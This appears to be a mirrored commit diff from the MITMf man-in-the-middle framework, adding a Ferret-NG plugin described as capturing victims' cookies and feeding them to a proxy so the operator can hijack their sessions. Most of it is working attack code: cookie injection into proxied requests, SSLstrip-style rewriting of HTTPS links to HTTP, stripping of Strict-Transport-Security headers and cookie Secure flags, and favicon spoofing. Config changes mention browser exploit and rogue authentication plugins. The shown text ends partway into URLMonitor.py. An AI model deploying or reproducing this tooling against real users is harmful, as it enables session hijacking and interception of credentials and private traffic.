mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-07 13:32:18 -07:00
Initial working PoC for the Ferret-NG plugin that will replace the SessionHijacker plugin: it will capture cookies and trasparently feed them to the proxy it starts up on port 10010 (by default), this way we just have to connect to the proxy, browse to the same website as the victim and we will automatically hijack their session! \o/
The way MITMf hooks SSLstrip's functions has been modified to improve plugin code readability, additionally corrected some useless function hooks that were placed in early framework realeases and never removed. Replace plugin has been given it's own section in the config file currently the BeedAutorun and Javapwn plugins have to be cleaned up... BrowserProfile plugin's Pinlady code has been updated to the latest version (v0.9.0) and will now detect Flash player's version Javapwn plugin will be renamed to BrowserPwn and will support Flash exploits too , as supposed to only Java exploits Since we now have a built in SMB server, removed options to specify a host in the SMBauth plugin Tweaked the output of some plugins
This commit is contained in:
parent
d3e509d4cd
commit
79025dc77e
33 changed files with 1080 additions and 5488 deletions
|
@ -94,6 +94,14 @@
|
|||
subnet = 255.255.255.0
|
||||
dns_server = 192.168.2.20 #optional
|
||||
|
||||
[Replace]
|
||||
|
||||
[[Regex1]]
|
||||
'Google Search' = 'Google In My Pants'
|
||||
|
||||
[[Regex2]]
|
||||
"I'm Feeling Lucky" = "I'm Feeling Something In My Pants"
|
||||
|
||||
[Responder]
|
||||
|
||||
#Set these values to On or Off, so you can control which rogue authentication server is turned on.
|
||||
|
@ -223,7 +231,7 @@
|
|||
skip_in_mass_poison=1
|
||||
#you can add other scripts in additional sections like jQuery etc.
|
||||
|
||||
[JavaPwn]
|
||||
[BrowserPwn]
|
||||
|
||||
#
|
||||
# All versions strings without a * are considered vulnerable if clients Java version is <= update version
|
||||
|
|
|
@ -12,7 +12,6 @@ mitmf_logger = logging.getLogger('mitmf')
|
|||
class ConfigWatcher(FileSystemEventHandler):
|
||||
|
||||
_instance = None
|
||||
|
||||
config = ConfigObj("./config/mitmf.conf")
|
||||
|
||||
@staticmethod
|
||||
|
@ -43,5 +42,5 @@ class ConfigWatcher(FileSystemEventHandler):
|
|||
try:
|
||||
self.config = ConfigObj("./config/mitmf.conf")
|
||||
except Exception as e:
|
||||
mitmf_logger.warning("Error reloading config file: {}".format(e))
|
||||
mitmf_logger.error("Error reloading config file: {}".format(e))
|
||||
pass
|
||||
|
|
168
core/ferretNG/ClientRequest.py
Normal file
168
core/ferretNG/ClientRequest.py
Normal file
|
@ -0,0 +1,168 @@
|
|||
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
import urlparse
|
||||
import logging
|
||||
import os
|
||||
import sys
|
||||
import random
|
||||
import re
|
||||
|
||||
from twisted.web.http import Request
|
||||
from twisted.web.http import HTTPChannel
|
||||
from twisted.web.http import HTTPClient
|
||||
|
||||
from twisted.internet import ssl
|
||||
from twisted.internet import defer
|
||||
from twisted.internet import reactor
|
||||
from twisted.internet.protocol import ClientFactory
|
||||
|
||||
from ServerConnectionFactory import ServerConnectionFactory
|
||||
from ServerConnection import ServerConnection
|
||||
from SSLServerConnection import SSLServerConnection
|
||||
from URLMonitor import URLMonitor
|
||||
from CookieCleaner import CookieCleaner
|
||||
from DnsCache import DnsCache
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class ClientRequest(Request):
|
||||
|
||||
''' This class represents incoming client requests and is essentially where
|
||||
the magic begins. Here we remove the client headers we dont like, and then
|
||||
respond with either favicon spoofing, session denial, or proxy through HTTP
|
||||
or SSL to the server.
|
||||
'''
|
||||
|
||||
def __init__(self, channel, queued, reactor=reactor):
|
||||
Request.__init__(self, channel, queued)
|
||||
self.reactor = reactor
|
||||
self.urlMonitor = URLMonitor.getInstance()
|
||||
self.cookieCleaner = CookieCleaner.getInstance()
|
||||
self.dnsCache = DnsCache.getInstance()
|
||||
#self.uniqueId = random.randint(0, 10000)
|
||||
|
||||
def cleanHeaders(self):
|
||||
headers = self.getAllHeaders().copy()
|
||||
|
||||
if 'accept-encoding' in headers:
|
||||
del headers['accept-encoding']
|
||||
mitmf_logger.debug("[Ferret-NG] [ClientRequest] Zapped encoding")
|
||||
|
||||
if 'if-modified-since' in headers:
|
||||
del headers['if-modified-since']
|
||||
|
||||
if 'cache-control' in headers:
|
||||
del headers['cache-control']
|
||||
|
||||
if 'host' in headers:
|
||||
if headers['host'] in self.urlMonitor.cookies:
|
||||
mitmf_logger.info("[Ferret-NG] Hijacking session for host: {}".format(headers['host']))
|
||||
headers['cookie'] = self.urlMonitor.cookies[headers['host']]
|
||||
|
||||
return headers
|
||||
|
||||
def getPathFromUri(self):
|
||||
if (self.uri.find("http://") == 0):
|
||||
index = self.uri.find('/', 7)
|
||||
return self.uri[index:]
|
||||
|
||||
return self.uri
|
||||
|
||||
def handleHostResolvedSuccess(self, address):
|
||||
mitmf_logger.debug("[Ferret-NG] [ClientRequest] Resolved host successfully: {} -> {}".format(self.getHeader('host'), address))
|
||||
host = self.getHeader("host")
|
||||
headers = self.cleanHeaders()
|
||||
client = self.getClientIP()
|
||||
path = self.getPathFromUri()
|
||||
url = 'http://' + host + path
|
||||
self.uri = url # set URI to absolute
|
||||
|
||||
if self.content:
|
||||
self.content.seek(0,0)
|
||||
|
||||
postData = self.content.read()
|
||||
|
||||
hostparts = host.split(':')
|
||||
self.dnsCache.cacheResolution(hostparts[0], address)
|
||||
|
||||
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
|
||||
mitmf_logger.debug("[Ferret-NG] [ClientRequest] Sending expired cookies")
|
||||
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, host, headers, path))
|
||||
|
||||
elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
|
||||
if 'securelink' in headers:
|
||||
del headers['securelink']
|
||||
|
||||
mitmf_logger.debug("[Ferret-NG] [ClientRequest] Sending request via SSL ({})".format((client,url)))
|
||||
self.proxyViaSSL(address, self.method, path, postData, headers, self.urlMonitor.getSecurePort(client, url))
|
||||
|
||||
else:
|
||||
mitmf_logger.debug("[Ferret-NG] [ClientRequest] Sending request via HTTP")
|
||||
#self.proxyViaHTTP(address, self.method, path, postData, headers)
|
||||
port = 80
|
||||
if len(hostparts) > 1:
|
||||
port = int(hostparts[1])
|
||||
|
||||
self.proxyViaHTTP(address, self.method, path, postData, headers, port)
|
||||
|
||||
def handleHostResolvedError(self, error):
|
||||
mitmf_logger.debug("[Ferret-NG] [ClientRequest] Host resolution error: {}".format(error))
|
||||
try:
|
||||
self.finish()
|
||||
except:
|
||||
pass
|
||||
|
||||
def resolveHost(self, host):
|
||||
address = self.dnsCache.getCachedAddress(host)
|
||||
|
||||
if address != None:
|
||||
mitmf_logger.debug("[Ferret-NG] [ClientRequest] Host cached: {} {}".format(host, address))
|
||||
return defer.succeed(address)
|
||||
else:
|
||||
return reactor.resolve(host)
|
||||
|
||||
def process(self):
|
||||
mitmf_logger.debug("[Ferret-NG] [ClientRequest] Resolving host: {}".format(self.getHeader('host')))
|
||||
host = self.getHeader('host').split(":")[0]
|
||||
|
||||
deferred = self.resolveHost(host)
|
||||
deferred.addCallback(self.handleHostResolvedSuccess)
|
||||
deferred.addErrback(self.handleHostResolvedError)
|
||||
|
||||
def proxyViaHTTP(self, host, method, path, postData, headers, port):
|
||||
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
|
||||
connectionFactory.protocol = ServerConnection
|
||||
#self.reactor.connectTCP(host, 80, connectionFactory)
|
||||
self.reactor.connectTCP(host, port, connectionFactory)
|
||||
|
||||
def proxyViaSSL(self, host, method, path, postData, headers, port):
|
||||
clientContextFactory = ssl.ClientContextFactory()
|
||||
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
|
||||
connectionFactory.protocol = SSLServerConnection
|
||||
self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory)
|
||||
|
||||
def sendExpiredCookies(self, host, path, expireHeaders):
|
||||
self.setResponseCode(302, "Moved")
|
||||
self.setHeader("Connection", "close")
|
||||
self.setHeader("Location", "http://" + host + path)
|
||||
|
||||
for header in expireHeaders:
|
||||
self.setHeader("Set-Cookie", header)
|
||||
|
||||
self.finish()
|
105
core/ferretNG/CookieCleaner.py
Normal file
105
core/ferretNG/CookieCleaner.py
Normal file
|
@ -0,0 +1,105 @@
|
|||
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
import logging
|
||||
import string
|
||||
|
||||
class CookieCleaner:
|
||||
'''This class cleans cookies we haven't seen before. The basic idea is to
|
||||
kill sessions, which isn't entirely straight-forward. Since we want this to
|
||||
be generalized, there's no way for us to know exactly what cookie we're trying
|
||||
to kill, which also means we don't know what domain or path it has been set for.
|
||||
|
||||
The rule with cookies is that specific overrides general. So cookies that are
|
||||
set for mail.foo.com override cookies with the same name that are set for .foo.com,
|
||||
just as cookies that are set for foo.com/mail override cookies with the same name
|
||||
that are set for foo.com/
|
||||
|
||||
The best we can do is guess, so we just try to cover our bases by expiring cookies
|
||||
in a few different ways. The most obvious thing to do is look for individual cookies
|
||||
and nail the ones we haven't seen coming from the server, but the problem is that cookies are often
|
||||
set by Javascript instead of a Set-Cookie header, and if we block those the site
|
||||
will think cookies are disabled in the browser. So we do the expirations and whitlisting
|
||||
based on client,server tuples. The first time a client hits a server, we kill whatever
|
||||
cookies we see then. After that, we just let them through. Not perfect, but pretty effective.
|
||||
|
||||
'''
|
||||
|
||||
_instance = None
|
||||
|
||||
def __init__(self):
|
||||
self.cleanedCookies = set();
|
||||
self.enabled = False
|
||||
|
||||
@staticmethod
|
||||
def getInstance():
|
||||
if CookieCleaner._instance == None:
|
||||
CookieCleaner._instance = CookieCleaner()
|
||||
|
||||
return CookieCleaner._instance
|
||||
|
||||
def setEnabled(self, enabled):
|
||||
self.enabled = enabled
|
||||
|
||||
def isClean(self, method, client, host, headers):
|
||||
if method == "POST": return True
|
||||
if not self.enabled: return True
|
||||
if not self.hasCookies(headers): return True
|
||||
|
||||
return (client, self.getDomainFor(host)) in self.cleanedCookies
|
||||
|
||||
def getExpireHeaders(self, method, client, host, headers, path):
|
||||
domain = self.getDomainFor(host)
|
||||
self.cleanedCookies.add((client, domain))
|
||||
|
||||
expireHeaders = []
|
||||
|
||||
for cookie in headers['cookie'].split(";"):
|
||||
cookie = cookie.split("=")[0].strip()
|
||||
expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path)
|
||||
expireHeaders.extend(expireHeadersForCookie)
|
||||
|
||||
return expireHeaders
|
||||
|
||||
def hasCookies(self, headers):
|
||||
return 'cookie' in headers
|
||||
|
||||
def getDomainFor(self, host):
|
||||
hostParts = host.split(".")
|
||||
return "." + hostParts[-2] + "." + hostParts[-1]
|
||||
|
||||
def getExpireCookieStringFor(self, cookie, host, domain, path):
|
||||
pathList = path.split("/")
|
||||
expireStrings = list()
|
||||
|
||||
expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain +
|
||||
";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
|
||||
|
||||
expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host +
|
||||
";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
|
||||
|
||||
if len(pathList) > 2:
|
||||
expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
|
||||
domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
|
||||
|
||||
expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
|
||||
host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
|
||||
|
||||
return expireStrings
|
||||
|
||||
|
49
core/ferretNG/DnsCache.py
Normal file
49
core/ferretNG/DnsCache.py
Normal file
|
@ -0,0 +1,49 @@
|
|||
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
import logging
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class DnsCache:
|
||||
|
||||
'''
|
||||
The DnsCache maintains a cache of DNS lookups, mirroring the browser experience.
|
||||
'''
|
||||
|
||||
_instance = None
|
||||
|
||||
def __init__(self):
|
||||
self.customAddress = None
|
||||
self.cache = {}
|
||||
|
||||
@staticmethod
|
||||
def getInstance():
|
||||
if DnsCache._instance == None:
|
||||
DnsCache._instance = DnsCache()
|
||||
|
||||
return DnsCache._instance
|
||||
|
||||
def cacheResolution(self, host, address):
|
||||
self.cache[host] = address
|
||||
|
||||
def getCachedAddress(self, host):
|
||||
if host in self.cache:
|
||||
return self.cache[host]
|
||||
|
||||
return None
|
24
core/ferretNG/FerretProxy.py
Normal file
24
core/ferretNG/FerretProxy.py
Normal file
|
@ -0,0 +1,24 @@
|
|||
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
from twisted.web.http import HTTPChannel
|
||||
from ClientRequest import ClientRequest
|
||||
|
||||
class FerretProxy(HTTPChannel):
|
||||
|
||||
requestFactory = ClientRequest
|
110
core/ferretNG/SSLServerConnection.py
Normal file
110
core/ferretNG/SSLServerConnection.py
Normal file
|
@ -0,0 +1,110 @@
|
|||
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
import logging, re, string
|
||||
|
||||
from ServerConnection import ServerConnection
|
||||
from URLMonitor import URLMonitor
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class SSLServerConnection(ServerConnection):
|
||||
|
||||
'''
|
||||
For SSL connections to a server, we need to do some additional stripping. First we need
|
||||
to make note of any relative links, as the server will be expecting those to be requested
|
||||
via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies.
|
||||
'''
|
||||
|
||||
cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
|
||||
cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)
|
||||
iconExpression = re.compile(r"<link rel=\"shortcut icon\" .*href=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
|
||||
linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
|
||||
headExpression = re.compile(r"<head>", re.IGNORECASE)
|
||||
|
||||
def __init__(self, command, uri, postData, headers, client):
|
||||
ServerConnection.__init__(self, command, uri, postData, headers, client)
|
||||
self.urlMonitor = URLMonitor.getInstance()
|
||||
|
||||
def getLogLevel(self):
|
||||
return logging.INFO
|
||||
|
||||
def getPostPrefix(self):
|
||||
return "SECURE POST"
|
||||
|
||||
def handleHeader(self, key, value):
|
||||
if (key.lower() == 'set-cookie'):
|
||||
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
|
||||
|
||||
ServerConnection.handleHeader(self, key, value)
|
||||
|
||||
def stripFileFromPath(self, path):
|
||||
(strippedPath, lastSlash, file) = path.rpartition('/')
|
||||
return strippedPath
|
||||
|
||||
def buildAbsoluteLink(self, link):
|
||||
absoluteLink = ""
|
||||
|
||||
if ((not link.startswith('http')) and (not link.startswith('/'))):
|
||||
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
|
||||
|
||||
mitmf_logger.debug("[Ferret-NG] [SSLServerConnection] Found path-relative link in secure transmission: " + link)
|
||||
mitmf_logger.debug("[Ferret-NG] [SSLServerConnection] New Absolute path-relative link: " + absoluteLink)
|
||||
elif not link.startswith('http'):
|
||||
absoluteLink = "http://"+self.headers['host']+link
|
||||
|
||||
mitmf_logger.debug("[Ferret-NG] [SSLServerConnection] Found relative link in secure transmission: " + link)
|
||||
mitmf_logger.debug("[Ferret-NG] [SSLServerConnection] New Absolute link: " + absoluteLink)
|
||||
|
||||
if not absoluteLink == "":
|
||||
absoluteLink = absoluteLink.replace('&', '&')
|
||||
self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink);
|
||||
|
||||
def replaceCssLinks(self, data):
|
||||
iterator = re.finditer(SSLServerConnection.cssExpression, data)
|
||||
|
||||
for match in iterator:
|
||||
self.buildAbsoluteLink(match.group(1))
|
||||
|
||||
return data
|
||||
|
||||
def replaceFavicon(self, data):
|
||||
match = re.search(SSLServerConnection.iconExpression, data)
|
||||
|
||||
if (match != None):
|
||||
data = re.sub(SSLServerConnection.iconExpression,
|
||||
"<link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
|
||||
else:
|
||||
data = re.sub(SSLServerConnection.headExpression,
|
||||
"<head><link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
|
||||
|
||||
return data
|
||||
|
||||
def replaceSecureLinks(self, data):
|
||||
data = ServerConnection.replaceSecureLinks(self, data)
|
||||
data = self.replaceCssLinks(data)
|
||||
|
||||
if (self.urlMonitor.isFaviconSpoofing()):
|
||||
data = self.replaceFavicon(data)
|
||||
|
||||
iterator = re.finditer(SSLServerConnection.linkExpression, data)
|
||||
|
||||
for match in iterator:
|
||||
self.buildAbsoluteLink(match.group(10))
|
||||
|
||||
return data
|
193
core/ferretNG/ServerConnection.py
Normal file
193
core/ferretNG/ServerConnection.py
Normal file
|
@ -0,0 +1,193 @@
|
|||
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
import logging
|
||||
import re
|
||||
import string
|
||||
import random
|
||||
import zlib
|
||||
import gzip
|
||||
import StringIO
|
||||
import sys
|
||||
|
||||
from twisted.web.http import HTTPClient
|
||||
from URLMonitor import URLMonitor
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class ServerConnection(HTTPClient):
|
||||
|
||||
''' The server connection is where we do the bulk of the stripping. Everything that
|
||||
comes back is examined. The headers we dont like are removed, and the links are stripped
|
||||
from HTTPS to HTTP.
|
||||
'''
|
||||
|
||||
urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
|
||||
urlType = re.compile(r"https://", re.IGNORECASE)
|
||||
urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
|
||||
urlTypewww = re.compile(r"https://www", re.IGNORECASE)
|
||||
urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
|
||||
urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE)
|
||||
urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE)
|
||||
#urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE)
|
||||
|
||||
def __init__(self, command, uri, postData, headers, client):
|
||||
|
||||
self.command = command
|
||||
self.uri = uri
|
||||
self.postData = postData
|
||||
self.headers = headers
|
||||
self.client = client
|
||||
self.clientInfo = None
|
||||
self.urlMonitor = URLMonitor.getInstance()
|
||||
self.isImageRequest = False
|
||||
self.isCompressed = False
|
||||
self.contentLength = None
|
||||
self.shutdownComplete = False
|
||||
|
||||
def getPostPrefix(self):
|
||||
return "POST"
|
||||
|
||||
def sendRequest(self):
|
||||
if self.command == 'GET':
|
||||
|
||||
mitmf_logger.debug(self.client.getClientIP() + " [Ferret-NG] Sending Request: {}".format(self.headers['host']))
|
||||
|
||||
self.sendCommand(self.command, self.uri)
|
||||
|
||||
def sendHeaders(self):
|
||||
for header, value in self.headers.iteritems():
|
||||
mitmf_logger.debug("[Ferret-NG] [ServerConnection] Sending header: ({}: {})".format(header, value))
|
||||
self.sendHeader(header, value)
|
||||
|
||||
self.endHeaders()
|
||||
|
||||
def sendPostData(self):
|
||||
|
||||
self.transport.write(self.postData)
|
||||
|
||||
def connectionMade(self):
|
||||
mitmf_logger.debug("[Ferret-NG] [ServerConnection] HTTP connection made.")
|
||||
self.sendRequest()
|
||||
self.sendHeaders()
|
||||
|
||||
if (self.command == 'POST'):
|
||||
self.sendPostData()
|
||||
|
||||
def handleStatus(self, version, code, message):
|
||||
mitmf_logger.debug("[Ferret-NG] [ServerConnection] Server response: {} {} {}".format(version, code, message))
|
||||
self.client.setResponseCode(int(code), message)
|
||||
|
||||
def handleHeader(self, key, value):
|
||||
if (key.lower() == 'location'):
|
||||
value = self.replaceSecureLinks(value)
|
||||
|
||||
if (key.lower() == 'content-type'):
|
||||
if (value.find('image') != -1):
|
||||
self.isImageRequest = True
|
||||
mitmf_logger.debug("[Ferret-NG] [ServerConnection] Response is image content, not scanning")
|
||||
|
||||
if (key.lower() == 'content-encoding'):
|
||||
if (value.find('gzip') != -1):
|
||||
mitmf_logger.debug("[Ferret-NG] [ServerConnection] Response is compressed")
|
||||
self.isCompressed = True
|
||||
|
||||
elif (key.lower()== 'strict-transport-security'):
|
||||
mitmf_logger.debug("[Ferret-NG] [ServerConnection] Zapped a strict-trasport-security header")
|
||||
|
||||
elif (key.lower() == 'content-length'):
|
||||
self.contentLength = value
|
||||
|
||||
elif (key.lower() == 'set-cookie'):
|
||||
self.client.responseHeaders.addRawHeader(key, value)
|
||||
|
||||
else:
|
||||
self.client.setHeader(key, value)
|
||||
|
||||
def handleEndHeaders(self):
|
||||
if (self.isImageRequest and self.contentLength != None):
|
||||
self.client.setHeader("Content-Length", self.contentLength)
|
||||
|
||||
if self.length == 0:
|
||||
self.shutdown()
|
||||
|
||||
if logging.getLevelName(mitmf_logger.getEffectiveLevel()) == "DEBUG":
|
||||
for header, value in self.client.headers.iteritems():
|
||||
mitmf_logger.debug("[Ferret-NG] [ServerConnection] Receiving header: ({}: {})".format(header, value))
|
||||
|
||||
def handleResponsePart(self, data):
|
||||
if (self.isImageRequest):
|
||||
self.client.write(data)
|
||||
else:
|
||||
HTTPClient.handleResponsePart(self, data)
|
||||
|
||||
def handleResponseEnd(self):
|
||||
if (self.isImageRequest):
|
||||
self.shutdown()
|
||||
else:
|
||||
try:
|
||||
HTTPClient.handleResponseEnd(self) #Gets rid of some generic errors
|
||||
except:
|
||||
pass
|
||||
|
||||
def handleResponse(self, data):
|
||||
if (self.isCompressed):
|
||||
mitmf_logger.debug("[Ferret-NG] [ServerConnection] Decompressing content...")
|
||||
data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
|
||||
|
||||
data = self.replaceSecureLinks(data)
|
||||
|
||||
mitmf_logger.debug("[Ferret-NG] [ServerConnection] Read from server {} bytes of data".format(len(data)))
|
||||
|
||||
if (self.contentLength != None):
|
||||
self.client.setHeader('Content-Length', len(data))
|
||||
|
||||
try:
|
||||
self.client.write(data)
|
||||
except:
|
||||
pass
|
||||
|
||||
try:
|
||||
self.shutdown()
|
||||
except:
|
||||
mitmf_logger.info("[Ferret-NG] [ServerConnection] Client connection dropped before request finished.")
|
||||
|
||||
def replaceSecureLinks(self, data):
|
||||
|
||||
iterator = re.finditer(ServerConnection.urlExpression, data)
|
||||
|
||||
for match in iterator:
|
||||
url = match.group()
|
||||
|
||||
mitmf_logger.debug("[Ferret-NG] [ServerConnection] Found secure reference: " + url)
|
||||
|
||||
url = url.replace('https://', 'http://', 1)
|
||||
url = url.replace('&', '&')
|
||||
self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
|
||||
|
||||
data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data)
|
||||
return re.sub(ServerConnection.urlType, 'http://', data)
|
||||
|
||||
def shutdown(self):
|
||||
if not self.shutdownComplete:
|
||||
self.shutdownComplete = True
|
||||
try:
|
||||
self.client.finish()
|
||||
self.transport.loseConnection()
|
||||
except:
|
||||
pass
|
48
core/ferretNG/ServerConnectionFactory.py
Normal file
48
core/ferretNG/ServerConnectionFactory.py
Normal file
|
@ -0,0 +1,48 @@
|
|||
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
import logging
|
||||
from twisted.internet.protocol import ClientFactory
|
||||
|
||||
mitmf_logger = logging.getLogger('mimtf')
|
||||
|
||||
class ServerConnectionFactory(ClientFactory):
|
||||
|
||||
def __init__(self, command, uri, postData, headers, client):
|
||||
self.command = command
|
||||
self.uri = uri
|
||||
self.postData = postData
|
||||
self.headers = headers
|
||||
self.client = client
|
||||
|
||||
def buildProtocol(self, addr):
|
||||
return self.protocol(self.command, self.uri, self.postData, self.headers, self.client)
|
||||
|
||||
def clientConnectionFailed(self, connector, reason):
|
||||
mitmf_logger.debug("[ServerConnectionFactory] Server connection failed.")
|
||||
|
||||
destination = connector.getDestination()
|
||||
|
||||
if (destination.port != 443):
|
||||
mitmf_logger.debug("[ServerConnectionFactory] Retrying via SSL")
|
||||
self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
|
||||
else:
|
||||
try:
|
||||
self.client.finish()
|
||||
except:
|
||||
pass
|
85
core/ferretNG/URLMonitor.py
Normal file
85
core/ferretNG/URLMonitor.py
Normal file
|
@ -0,0 +1,85 @@
|
|||
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
|
||||
#
|
||||
